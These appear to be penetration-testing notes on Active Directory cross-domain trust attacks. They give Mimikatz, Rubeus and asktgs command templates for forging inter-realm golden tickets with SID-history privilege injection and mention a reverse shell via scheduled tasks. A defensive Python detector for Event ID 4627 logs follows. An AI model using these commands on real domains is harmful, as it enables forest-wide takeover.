TRUST BASED DOMAIN ATTACKS
USING TRUST KEY
Domain Admin privileges in the current domain are needed to extract the trust key and perform attacks across a domain trust.
To extract the domain trust key with Mimikatz:
Invoke-Mimikatz -Command '"lsadump::trust /patch"'
Create an Inter-Realm TGT for the target domain:
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<ATTACKER DOMAIN NAME> /sid:<ATTACKER DOMAIN SID> /sids:<TARGET DOMAIN SID>-<RID> /rc4:<TRUST KEY> /service:krbtgt /target:<TARGET DOMAIN NAME> /ticket:<TICKET PATH>"'
The RID appended to the target domain SID selects the group that is injected via SID history. Commonly used privileged RIDs are:
Enterprise Admins - 519
Schema Admins - 518
Domain Admins - 512
Request a TGS from the target domain's DC using the Inter-Realm TGT:
.\asktgs.exe <PATH TO TGT> CIFS/<TARGET DOMAIN DC FQDN>
Present the TGS to the service by injecting it into the current logon session:
.\kirbikator.exe lsa <TGS PATH>
Alternatively, Rubeus can request the TGS from the Inter-Realm TGT and inject it in one step:
.\Rubeus.exe asktgs /ticket:<TRUST TGT> /service:cifs/<TARGET DOMAIN NAME> /dc:<DC OF TARGET DOMAIN> /ptt
USING KRBTGT HASH
Instead of the domain trust key, the krbtgt hash of the current domain is used to forge the Inter-Realm TGT.
Create an Inter-Realm TGT for the target domain:
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<ATTACKER DOMAIN NAME> /sid:<ATTACKER DOMAIN SID> /sids:<TARGET DOMAIN SID>-<RID> /krbtgt:<KRBTGT NTLM> /service:krbtgt /target:<TARGET DOMAIN NAME> /ticket:<TICKET PATH>"'
Inject the saved TGT with a Pass The Ticket attack:
Invoke-Mimikatz -Command '"kerberos::ptt <TGT PATH>"'
Verify the ticket by running a WMI query against the target; output from the query confirms the ticket was accepted.
The HOST service can be requested instead of CIFS.
A reverse shell can then be spawned via scheduled tasks.
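Added here as a detection-side example, not part of these notes: both sections above forge a ticket whose SID history carries <TARGET DOMAIN SID>-<RID>, so on the target domain's DCs the signal to look for is a logon by an account from the trusting domain whose token contains a privileged group SID from a different domain than the account itself. The Python script below runs that check over constructed records modelled on Event ID 4627 (Group Membership Information), which requires Audit Group Membership to be enabled; the record layout, SIDs and known-good list are simplified assumptions, not real log output.

```python
import re
from dataclasses import dataclass, field

# RIDs the notes above use in the /sids: parameter (target domain SID + RID)
PRIVILEGED_RIDS = {512: "Domain Admins", 518: "Schema Admins", 519: "Enterprise Admins"}

SID_RE = re.compile(r"^(S-1-5-21-\d+-\d+-\d+)-(\d+)$")

def split_sid(sid):
    """Split a domain SID into (domain prefix, RID); (None, None) if not a domain SID."""
    m = SID_RE.match(sid)
    return (m.group(1), int(m.group(2))) if m else (None, None)

@dataclass
class LogonEvent:
    event_id: int              # 4627 = Group Membership Information
    account_sid: str           # SID of the account that logged on
    group_sids: list = field(default_factory=list)  # group SIDs present in the token

def find_foreign_privileged_groups(events, known_good=frozenset()):
    """Flag logons whose token holds a privileged group from a different domain
    than the account's own, unless (account_sid, group_sid) is in known_good."""
    hits = []
    for ev in events:
        if ev.event_id != 4627:
            continue
        acct_domain, _ = split_sid(ev.account_sid)
        for group in ev.group_sids:
            grp_domain, rid = split_sid(group)
            if grp_domain is None or rid not in PRIVILEGED_RIDS:
                continue
            if grp_domain != acct_domain and (ev.account_sid, group) not in known_good:
                hits.append((ev.account_sid, group, PRIVILEGED_RIDS[rid]))
    return hits

# Constructed sample: CHILD is the domain the ticket is forged in, PARENT the target domain.
CHILD, PARENT = "S-1-5-21-1111-2222-3333", "S-1-5-21-4444-5555-6666"
SAMPLE_EVENTS = [
    LogonEvent(4627, f"{CHILD}-500", [f"{CHILD}-513", f"{PARENT}-519"]),    # forged /sids: EA RID
    LogonEvent(4627, f"{PARENT}-1104", [f"{PARENT}-513", f"{PARENT}-512"]),  # ordinary DA logon
    LogonEvent(4627, f"{CHILD}-1105", [f"{CHILD}-513", f"{PARENT}-512"]),    # real cross-domain member
    LogonEvent(4624, f"{CHILD}-500"),                                      # no group data, skipped
]
# Pairs confirmed against AD group membership (constructed); a real run builds this from AD.
KNOWN_GOOD = frozenset({(f"{CHILD}-1105", f"{PARENT}-512")})

def run_sample():
    return find_foreign_privileged_groups(SAMPLE_EVENTS, KNOWN_GOOD)
```

Genuine membership in universal groups across domains produces the same pattern, so the known-good pairs must come from actual AD group membership rather than being guessed. SID filtering on external and forest trusts discards injected SIDs outright, but it is not applied to trusts inside a forest, which is where this log-side check matters most.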